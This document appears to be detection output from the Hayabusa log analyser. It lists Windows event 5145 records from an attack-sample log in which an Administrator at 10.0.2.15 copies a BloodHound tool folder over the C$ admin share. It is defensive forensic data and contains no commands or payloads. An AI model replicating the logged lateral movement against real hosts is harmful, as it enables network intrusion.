10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.127 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.127 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\.nyc_output : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\examples\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\tests : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.157 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\asap : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.157 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.167 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.167 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async\internal : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\array : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.187 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\error : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.187 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\math : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\number : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\object : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\reflect : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\regexp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\string : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\symbol : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.217 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\system : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.217 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\helpers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\regenerator : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\balanced-match : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\big-integer : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\example : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\perf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js\browser : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js\release : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\css : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\fonts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\fonts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\grunt : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.287 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\less : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.287 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\less\mixins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap-3-typeahead : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea\inspectionProfiles : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea\markdown-navigator : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\brace-expansion : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-from : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-indexof-polyfill : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 